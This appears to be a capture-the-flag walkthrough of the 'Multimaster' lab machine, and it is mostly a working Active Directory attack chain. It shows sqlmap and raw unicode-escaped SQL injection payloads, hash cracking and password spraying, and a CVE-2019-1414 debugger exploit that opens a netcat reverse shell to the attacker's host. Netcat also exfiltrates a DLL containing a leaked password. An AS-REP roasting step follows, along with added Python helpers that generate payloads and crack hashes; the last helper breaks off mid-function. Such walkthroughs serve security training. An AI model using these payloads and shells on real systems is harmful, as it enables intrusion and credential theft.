Multimaster

Nmap

nmap -sC -T5 -p- -Pn 10.10.10.179                                                
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-25 17:20 BST
Warning: 10.10.10.179 giving up on port because retransmission cap hit (1).
Stats: 0:03:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 92.46% done; ETC: 17:23 (0:00:15 remaining)
Nmap scan report for 10.10.10.179
Host is up, received user-set (0.12s latency).
Not shown: 65513 filtered ports
Reason: 65513 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
80/tcp    open  http             syn-ack ttl 127
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: MegaCorp
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
3389/tcp  open  ms-wbt-server    syn-ack ttl 127
| rdp-ntlm-info: 
|   Target_Name: MEGACORP
|   NetBIOS_Domain_Name: MEGACORP
|   NetBIOS_Computer_Name: MULTIMASTER
|   DNS_Domain_Name: MEGACORP.LOCAL
|   DNS_Computer_Name: MULTIMASTER.MEGACORP.LOCAL
|   DNS_Tree_Name: MEGACORP.LOCAL
|   Product_Version: 10.0.14393
|_  System_Time: 2020-05-25T16:34:34+00:00
| ssl-cert: Subject: commonName=MULTIMASTER.MEGACORP.LOCAL
| Not valid before: 2020-03-08T09:52:26
|_Not valid after:  2020-09-07T09:52:26
|_ssl-date: 2020-05-25T16:34:34+00:00; +10m35s from scanner time.
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49666/tcp open  unknown          syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49673/tcp open  unknown          syn-ack ttl 127
49674/tcp open  unknown          syn-ack ttl 127
49676/tcp open  unknown          syn-ack ttl 127
49696/tcp open  unknown          syn-ack ttl 127
49740/tcp open  unknown          syn-ack ttl 127

Host script results:
|_clock-skew: mean: 1h34m35s, deviation: 3h07m52s, median: 10m33s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: MULTIMASTER
|   NetBIOS computer name: MULTIMASTER\x00
|   Domain name: MEGACORP.LOCAL
|   Forest name: MEGACORP.LOCAL
|   FQDN: MULTIMASTER.MEGACORP.LOCAL
|_  System time: 2020-05-25T09:34:39-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-05-25T16:34:35
|_  start_date: 2020-05-25T05:30:07

Nmap done: 1 IP address (1 host up) scanned in 332.27 seconds

User

To start, we browse the website, which lets us search for employees.
We build a user list from the JSON it returns:

{"id":1,"name":"Sarina Bauer","position":"Junior Developer","email":"sbauer@megacorp.htb","src":"sbauer.jpg"},
{"id":2,"name":"Octavia Kent","position":"Senior Consultant","email":"okent@megacorp.htb","src":"okent.jpg"},
{"id":3,"name":"Christian Kane","position":"Assistant Manager","email":"ckane@megacorp.htb","src":"ckane.jpg"},
{"id":4,"name":"Kimberly Page","position":"Financial Analyst","email":"kpage@megacorp.htb","src":"kpage.jpg"},
{"id":5,"name":"Shayna Stafford","position":"HR Manager","email":"shayna@megacorp.htb","src":"shayna.jpg"},
{"id":6,"name":"James Houston","position":"QA Lead","email":"james@megacorp.htb","src":"james.jpg"},
{"id":7,"name":"Connor York","position":"Web Developer","email":"cyork@megacorp.htb","src":"cyork.jpg"},
{"id":8,"name":"Reya Martin","position":"Tech Support","email":"rmartin@megacorp.htb","src":"rmartin.jpg"},
{"id":9,"name":"Zac Curtis","position":"Junior Analyst","email":"zac@magacorp.htb","src":"zac.jpg"},
{"id":10,"name":"Jorden Mclean","position":"Full-Stack Developer","email":"jorden@megacorp.htb","src":"jorden.jpg"},
{"id":11,"name":"Alyx Walters","position":"Automation Engineer","email":"alyx@megacorp.htb","src":"alyx.jpg"},
{"id":12,"name":"Ian Lee","position":"Internal Auditor","email":"ilee@megacorp.htb","src":"ilee.jpg"},
{"id":13,"name":"Nikola Bourne","position":"Head of Accounts","email":"nbourne@megacorp.htb","src":"nbourne.jpg"},
{"id":14,"name":"Zachery Powers","position":"Credit Analyst","email":"zpowers@megacorp.htb","src":"zpowers.jpg"},
{"id":15,"name":"Alessandro Dominguez","position":"Senior Web Developer","email":"aldom@megacorp.htb","src":"aldom.jpg"},
{"id":16,"name":"MinatoTW","position":"CEO","email":"minato@megacorp.htb","src":"minato.jpg"},
{"id":17,"name":"egre55","position":"CEO","email":"egre55@megacorp.htb","src":"egre55.jpg"}

After some enumeration it looks like a WAF is in place that lets unicode-escaped input through,
so I run sqlmap against the request with the charunicodeescape tamper script.

sqlmap -r sqlmap_req --tamper charunicodeescape --dbs --delay 3
...
available databases [5]:
[*] Hub_DB
[*] master
[*] model
[*] msdb
[*] tempdb
...

Next I look for tables in the Hub_DB database;
sqlmap has meanwhile identified the backend as MSSQL.

sqlmap -r sqlmap_req --tamper charunicodeescape --dbms=mssql -D Hub_DB --tables --delay 3

Database: Hub_DB
[2 tables]
+------------+
| Colleagues |
| Logins     |
+------------+

Finally we dump the Logins table:

sqlmap -r sqlmap_req --tamper charunicodeescape --dbms=mssql -D Hub_DB -T Logins -C username,password --dump --delay 3

Database: Hub_DB
Table: Logins
[17 entries]
+----------+--------------------------------------------------------------------------------------------------+
| username | password                                                                                         |
+----------+--------------------------------------------------------------------------------------------------+
| sbauer   | 9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739 |
| okent    | fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa |
| ckane    | 68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813 |
| kpage    | 68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813 |
| shayna   | 9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739 |
| james    | 9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739 |
| cyork    | 9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739 |
| rmartin  | fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa |
| zac      | 68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813 |
| jorden   | 9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739 |
| alyx     | fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa |
| ilee     | 68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813 |
| nbourne  | fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa |
| zpowers  | 68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813 |
| aldom    | 9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739 |
| minatotw | cf17bb4919cab4729d835e734825ef16d47de2d9615733fcba3b6e0a7aa7c53edd986b64bf715d0a2df0015fd090babc |
| egre55   | cf17bb4919cab4729d835e734825ef16d47de2d9615733fcba3b6e0a7aa7c53edd986b64bf715d0a2df0015fd090babc |
+----------+--------------------------------------------------------------------------------------------------+

As you can see, several users share the same hash, so there are only four distinct passwords. The digests are 96 hex characters long, i.e. unsalted SHA-384 (hashcat mode 10800); three of them crack:

9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739: password1
68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813: finance1
fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa: banking1
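As an added example (not from the original write-up), a small Python script that does the two checks worth doing on such a dump before starting hashcat: identify the algorithm from the digest length (96 hex characters is SHA-384) and group users by identical digest, because in an unsalted store identical hashes are identical passwords, so each distinct digest only needs to be cracked once. The LOGINS dict is constructed from a subset of the sqlmap output above and the wordlist is a stand-in for rockyou.

```python
import hashlib
from collections import defaultdict

# Constructed from the sqlmap dump above (a subset is enough to show the reuse).
LOGINS = {
    "sbauer":   "9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739",
    "okent":    "fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa",
    "ckane":    "68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813",
    "kpage":    "68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813",
    "minatotw": "cf17bb4919cab4729d835e734825ef16d47de2d9615733fcba3b6e0a7aa7c53edd986b64bf715d0a2df0015fd090babc",
}

# Hex digest length -> (hashlib name, hashcat mode) for plain, unsalted hashes
HEX_LEN_TO_ALGO = {32: ("md5", 0), 40: ("sha1", 100), 56: ("sha224", 1300),
                   64: ("sha256", 1400), 96: ("sha384", 10800), 128: ("sha512", 1700)}


def identify(hexdigest):
    """Guess the unsalted algorithm from the digest length; None if it is not a plain hex digest."""
    h = hexdigest.strip().lower()
    if not h or any(c not in "0123456789abcdef" for c in h):
        return None
    return HEX_LEN_TO_ALGO.get(len(h))


def digest(word, algo="sha384"):
    """Hex digest of a candidate password; the Logins table on this box stores plain SHA-384, no salt."""
    return hashlib.new(algo, word.encode()).hexdigest()


def group_by_hash(logins):
    """Map each distinct digest to the users sharing it; without a salt, same digest means same password."""
    groups = defaultdict(list)
    for user, h in logins.items():
        groups[h.lower()].append(user)
    return dict(groups)


def crack(hexdigest, wordlist, algo=None):
    """Return the first wordlist entry whose digest matches, or None."""
    if algo is None:
        guess = identify(hexdigest)
        if guess is None:
            raise ValueError("not a plain hex digest: %r" % hexdigest)
        algo = guess[0]
    target = hexdigest.strip().lower()
    for word in wordlist:
        if digest(word, algo) == target:
            return word
    return None


def crack_all(logins, wordlist):
    """Crack each distinct digest once and fan the result out to every user that shares it."""
    found = {}
    for h, users in group_by_hash(logins).items():
        pw = crack(h, wordlist)
        for user in users:
            found[user] = pw
    return found


if __name__ == "__main__":
    for h, users in group_by_hash(LOGINS).items():
        print(identify(h), users)
    # A real run would iterate over rockyou.txt; this constructed list just exercises the loop.
    print(crack_all(LOGINS, ["Summer2020", "password1", "finance1", "banking1"]))
```

For the real dump, replace the constructed wordlist with a file iterator over rockyou.txt; the grouping step is what makes it cheap, since the 17 rows collapse to four digests.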

Unfortunately none of the cracked passwords works for any of the users listed on the site.
After a good while I learn that the next step is to pull the domain SID through the SQLi. The UNION needs five columns to match the id, name, position, email and src fields of the JSON, and stuff(..., 1, 2, '') strips the 0x prefix from the hex string:

-' union select 1,2,3,4,(select (select stuff(upper(sys.fn_varbintohexstr((SELECT SUSER_SID('MEGACORP\Domain Admins')))), 1, 2, '')))-- -

But the server only accepts unicode escapes, so the query has to be converted (for example with
https://www.branah.com/unicode-converter):

\u002d\u0027 \u0075\u006e\u0069\u006f\u006e \u0073\u0065\u006c\u0065\u0063\u0074 \u0031\u002c\u0032\u002c\u0033\u002c\u0034\u002c\u0028\u0073\u0065\u006c\u0065\u0063\u0074 \u0028\u0073\u0065\u006c\u0065\u0063\u0074 \u0073\u0074\u0075\u0066\u0066\u0028\u0075\u0070\u0070\u0065\u0072\u0028\u0073\u0079\u0073\u002e\u0066\u006e\u005f\u0076\u0061\u0072\u0062\u0069\u006e\u0074\u006f\u0068\u0065\u0078\u0073\u0074\u0072\u0028\u0028\u0053\u0045\u004c\u0045\u0043\u0054 \u0053\u0055\u0053\u0045\u0052\u005f\u0053\u0049\u0044\u0028\u0027\u004d\u0045\u0047\u0041\u0043\u004f\u0052\u0050\u005c\u0044\u006f\u006d\u0061\u0069\u006e \u0041\u0064\u006d\u0069\u006e\u0073\u0027\u0029\u0029\u0029\u0029\u002c \u0031\u002c \u0032\u002c \u0027\u0027\u0029\u0029\u0029\u002d\u002d
[{"id":1,"name":"2","position":"3","email":"4","src":"0105000000000005150000001C00D1BCD181F1492BDFC23600020000"}]

The hex in src is the binary SID of Domain Admins: the last four bytes, 00020000, are the RID in little-endian (0x200 = 512), and everything before them is the domain SID. Swapping in other RIDs and resolving each candidate back to a name through the same injection (SUSER_SNAME() is the inverse of SUSER_SID()) enumerates the domain's users and groups, and this turns up accounts that are not on the website at all:

MEGACORP\\james
MEGACORP\\dai
MEGACORP\\tushikikatomo
MEGACORP\\zac
MEGACORP\\lana
MEGACORP\\andrew
MEGACORP\\jorden
MEGACORP\\alyx
MEGACORP\\Privileged IT Accounts
MEGACORP\\cyork
MEGACORP\\rmartin
Services:
MEGACORP\\DnsAdmins
MEGACORP\\DnsUpdateProxy
MEGACORP\\svc-nas
MEGACORP\\svc-sql
MEGACORP\\ckane
MEGACORP\\kpage
MEGACORP\\ilee
MEGACORP\\nbourne
MEGACORP\\zpowers
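What follows is an added example, not part of the original write-up, that makes the "modify the SID" step explicit in Python: decode the hex returned by SUSER_SID() into the familiar S-1-5-21-... form, strip the RID, re-encode the domain SID with candidate RIDs, and wrap each one in a SUSER_SNAME() UNION payload escaped the way the WAF accepted. It assumes the reverse lookup was done with SUSER_SNAME(), which the page does not show, and it sends nothing because the endpoint and parameter name are not given on the page; feed the yielded payloads to your own HTTP client.

```python
import struct

# Constructed from the injection above: what SUSER_SID('MEGACORP\Domain Admins') returned, minus the 0x prefix
DOMAIN_ADMINS_HEX = "0105000000000005150000001C00D1BCD181F1492BDFC23600020000"

# Well-known RIDs worth trying first; objects created after domain setup start at RID 1000
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt", 512: "Domain Admins",
                   513: "Domain Users", 515: "Domain Computers", 516: "Domain Controllers",
                   519: "Enterprise Admins"}


def sid_from_hex(hexsid):
    """Decode the binary SID layout: revision, sub-authority count, 48-bit big-endian authority, LE sub-authorities."""
    raw = bytes.fromhex(hexsid)
    revision, count = raw[0], raw[1]
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack("<%dI" % count, raw[8:8 + 4 * count])
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))


def sid_to_hex(sid):
    """Inverse of sid_from_hex; upper-case like sys.fn_varbintohexstr() output without the 0x prefix."""
    parts = sid.split("-")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    raw = (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
           + struct.pack("<%dI" % len(subs), *subs))
    return raw.hex().upper()


def domain_sid(principal_sid):
    """Strip the RID: S-1-5-21-a-b-c-RID -> S-1-5-21-a-b-c."""
    return principal_sid.rsplit("-", 1)[0]


def suser_sname_payload(sid_hex):
    """UNION payload that resolves a binary SID to a name in the 5th (src) column; 5 columns match the page's JSON."""
    return "-' union select 1,2,3,4,(select SUSER_SNAME(0x%s))-- -" % sid_hex


def unicode_escape(payload):
    """Escape every non-space character as \\uXXXX, the form the WAF let through (spaces stay literal)."""
    return "".join(c if c == " " else "\\u%04x" % ord(c) for c in payload)


def rid_payloads(domain_sid_str, rids):
    """Yield (rid, sid, escaped_payload) for each RID so the caller can send them with its own HTTP client."""
    for rid in rids:
        sid = "%s-%d" % (domain_sid_str, rid)
        yield rid, sid, unicode_escape(suser_sname_payload(sid_to_hex(sid)))


if __name__ == "__main__":
    da = sid_from_hex(DOMAIN_ADMINS_HEX)
    print("Domain Admins:", da)
    base = domain_sid(da)
    for rid, sid, payload in rid_payloads(base, list(WELL_KNOWN_RIDS) + list(range(1100, 1120))):
        print(rid, sid, payload[:60] + "...")
```

The decoded value matches the domain SID seen later in whoami /all (S-1-5-21-3167813660-1240564177-918740779), which is a cheap sanity check that the hex was parsed correctly before burning requests on a RID sweep. A name in the response means the RID exists; an empty src means it does not, so skip it and move on.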

Spraying the three cracked passwords against the new names gives a hit, tushikikatomo:finance1, and we log in and grab user.txt:

evil-winrm -i 10.10.10.179 -u tushikikatomo -p finance1

*Evil-WinRM* PS C:\Users\alcibiades\Desktop> cat user.txt
fa285fb87985e***cd040838271ec5

Root

*Evil-WinRM* PS C:\Users\alcibiades\Desktop> whoami /all

USER INFORMATION
----------------

User Name              SID
====================== =============================================
megacorp\tushikikatomo S-1-5-21-3167813660-1240564177-918740779-1110


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

The server is reportedly vulnerable to CVE-2019-1414: Visual Studio Code leaves a Node/Chromium debugger listening on localhost, and any local user who can reach that socket can run code as the user VS Code is running as. Links for exploiting it:
https://github.com/taviso/cefdebug/releases
https://iwantmore.pizza/posts/cve-2019-1414.html
https://nodejs.org/en/docs/guides/debugging-getting-started/

We download the files (cefdebug.exe and nc.exe, served from our machine on port 80) and run cefdebug to find the listening debuggers:

$client = new-object System.Net.WebClient
$client.DownloadFile("http://10.10.14.41:80/cefdebug.exe", "C:\tmp\cefdebug.exe")
$client.DownloadFile("http://10.10.14.41:80/nc.exe", "C:\tmp\nc.exe")
*Evil-WinRM* PS C:\tmp> ./cefdebug.exe
cefdebug.exe : [2020/06/09 03:04:20:7394] U: There are 5 tcp sockets in state listen.
    + CategoryInfo          : NotSpecified: ([2020/06/09 03:...n state listen.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
[2020/06/09 03:04:40:7860] U: There were 3 servers that appear to be CEF debuggers.
[2020/06/09 03:04:40:7860] U: ws://127.0.0.1:51421/d04706da-b6ce-46f8-b759-ce2bf2a6b2d2
[2020/06/09 03:04:40:7860] U: ws://127.0.0.1:21809/392228b8-fb19-4565-94c9-32832b31bc58
[2020/06/09 03:04:40:7860] U: ws://127.0.0.1:25829/abc6f8dd-bac8-4a9c-9c30-44a35ee7f76e

./cefdebug.exe --url ws://127.0.0.1:51421/d04706da-b6ce-46f8-b759-ce2bf2a6b2d2 --code "process.mainModule.require('child_process').exec('cmd.exe /c C:/tmp/nc.exe 10.10.14.41 9090 -e cmd.exe')"

On the netcat listener (port 9090) we get a shell as the user running VS Code:

C:\Program Files\Microsoft VS Code>whoami /all
whoami /all

USER INFORMATION
----------------

User Name      SID                                          
============== =============================================
megacorp\cyork S-1-5-21-3167813660-1240564177-918740779-3107


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes                                        
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Group used for deny only                          
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
MEGACORP\Developers                        Group            S-1-5-21-3167813660-1240564177-918740779-3119 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192                                                                                     


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

(People on the forum said to dig into the bin directory under wwwroot.)
This user is a member of the Developers group, which gives access to
C:\inetpub\wwwroot\bin
where the files of the Multimaster API live. We transfer them to our machine:
MultimasterAPI.dll
MultimasterAPI.pdb

C:\tmp\nc.exe 10.10.14.41 9091 < C:\inetpub\wwwroot\bin\MultimasterAPI.dll

nc -lvp 9091 > MultimasterAPI.dll
cat MultimasterAPI.dll
...
MASTER7{ "info" : "MegaCorp API" }!application/json��server=localhost;database=Hub_DB;uid=finder;password=D3veL0pM3nT!;
...

The connection string holds a password, D3veL0pM3nT!, for the SQL login finder. Since a developer wrote that string, it is worth spraying against the members of the Developers group:

*Evil-WinRM* PS C:\tmp> Get-ADGroupMember -Identity Developers


distinguishedName : CN=Sarina Bauer,OU=New York,OU=Employees,DC=MEGACORP,DC=LOCAL
name              : Sarina Bauer
objectClass       : user
objectGUID        : 548955df-e515-41c1-9afa-8130103570e2
SamAccountName    : sbauer
SID               : S-1-5-21-3167813660-1240564177-918740779-3102

distinguishedName : CN=Connor York,OU=New York,OU=Employees,DC=MEGACORP,DC=LOCAL
name              : Connor York
objectClass       : user
objectGUID        : 6c3c78ec-7e0a-48be-95d7-edd410457515
SamAccountName    : cyork
SID               : S-1-5-21-3167813660-1240564177-918740779-3107

distinguishedName : CN=Jorden Mclean,OU=Athens,OU=Employees,DC=MEGACORP,DC=LOCAL
name              : Jorden Mclean
objectClass       : user
objectGUID        : 0fa62545-eff1-4805-b16f-a18cf4217418
SamAccountName    : jorden
SID               : S-1-5-21-3167813660-1240564177-918740779-3110

distinguishedName : CN=Alessandro Dominguez,OU=London,OU=Employees,DC=MEGACORP,DC=LOCAL
name              : Alessandro Dominguez
objectClass       : user
objectGUID        : 0d1589a0-e3ae-431b-8568-b99922fdc40f
SamAccountName    : aldom
SID               : S-1-5-21-3167813660-1240564177-918740779-3115

It turns out sbauer reuses it:

evil-winrm.rb -i 10.10.10.179 -u sbauer -p D3veL0pM3nT!
*Evil-WinRM* PS C:\Users\sbauer\Documents> whoami /all

USER INFORMATION
----------------

User Name       SID
=============== =============================================
megacorp\sbauer S-1-5-21-3167813660-1240564177-918740779-3102


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                           Attributes
=========================================== ================ ============================================= ==================================================
Everyone                                    Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
MEGACORP\Developers                         Group            S-1-5-21-3167813660-1240564177-918740779-3119 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Further enumeration shows that sbauer has write access to the jorden user object. That is enough to set the DONT_REQ_PREAUTH flag on the account and then AS-REP roast it (this is AS-REP roasting, not Kerberoasting: no SPN is needed, the KDC simply returns an AS-REP encrypted with jorden's key to anyone who asks):

*Evil-WinRM* PS C:\Users\sbauer\Documents> Set-ADAccountControl -Identity jorden -doesnotrequirepreauth $true
python3 /opt/impacket/examples/GetNPUsers.py MEGACORP.local/sbauer:"D3veL0pM3nT\!" -dc-ip 10.10.10.179 -request
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation

Name    MemberOf                                      PasswordLastSet             LastLogon  UAC      
------  --------------------------------------------  --------------------------  ---------  --------
jorden  CN=Developers,OU=Groups,DC=MEGACORP,DC=LOCAL  2020-01-10 00:48:17.503303  <never>    0x410200 



$krb5asrep$23$jorden@MEGACORP.LOCAL:8c98ac39d7e9c82ba0b70f23960fa73f$e411714c2553dd153ad32f105b76200895f9aef932d210dd0b77a78afc611b193db648750543311a859853089962035c5c4c3742059bed95198056ce1a5868a81df60417ef1a626073e1a6fe89eaf985836111b782cf0dce8d48e58e3da5872e857fda0fea38c3b7734c9878840647fb197fd65e448acba78f8a997d2f799c762c241a15169d7b11f4b7140d90967f04d43fc81d51fbac8068f1b1b3d99f2fe7fe13e5a1dd0e63855df1fa96893c1e45c983731059e08cfcd851f16f004c67fcbe80ceefbf1e3ef390da6becb100f5000a4d330277e18495a621f8aea1d775ef9e5bce70ae4d35abb098ed1f0c5a8caa
hashcat -m 18200 -D 1 -a 0 -n 10 krb_tgt /usr/share/wordlists/rockyou.txt -o jorden_pass --force

$krb5asrep$23$jorden@MEGACORP.LOCAL:8c98ac39d7e9c82ba0b70f23960fa73f$e411714c2553dd153ad32f105b76200895f9aef932d210dd0b77a78afc611b193db648750543311a859853089962035c5c4c3742059bed95198056ce1a5868a81df60417ef1a626073e1a6fe89eaf985836111b782cf0dce8d48e58e3da5872e857fda0fea38c3b7734c9878840647fb197fd65e448acba78f8a997d2f799c762c241a15169d7b11f4b7140d90967f04d43fc81d51fbac8068f1b1b3d99f2fe7fe13e5a1dd0e63855df1fa96893c1e45c983731059e08cfcd851f16f004c67fcbe80ceefbf1e3ef390da6becb100f5000a4d330277e18495a621f8aea1d775ef9e5bce70ae4d35abb098ed1f0c5a8caa:rainforest786
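Added example, not from the original write-up: a Python helper that decodes the UAC column GetNPUsers prints (0x410200 above) to confirm that DONT_REQ_PREAUTH really got set on jorden, and that parses the $krb5asrep$ line to pick the hashcat mode (etype 23 is RC4-HMAC, mode 18200). The sample hash line is the page's own with the encrypted part truncated, so it is a constructed sample, not a crackable hash.

```python
import re

# userAccountControl bits (MS-ADTS 2.2.16) that matter when judging an account for roasting
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

# Kerberos encryption type in the $krb5asrep$ header -> hashcat mode; 23 is RC4-HMAC
ASREP_MODES = {23: 18200}

ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<enc>[0-9a-f]+)$", re.IGNORECASE)

# The page's GetNPUsers output with the encrypted part truncated (constructed sample, not a crackable hash)
SAMPLE_ASREP = ("$krb5asrep$23$jorden@MEGACORP.LOCAL:8c98ac39d7e9c82ba0b70f23960fa73f"
                "$e411714c2553dd153ad32f105b76200895f9aef932d210dd0b77a78afc611b19")


def decode_uac(value):
    """Named flags set in a userAccountControl value given as int or as the '0x410200' string impacket prints."""
    v = int(value, 0) if isinstance(value, str) else int(value)
    return {name for bit, name in UAC_FLAGS.items() if v & bit}


def asrep_roastable(value):
    """True when the KDC will hand out an AS-REP without pre-authentication for an enabled account."""
    flags = decode_uac(value)
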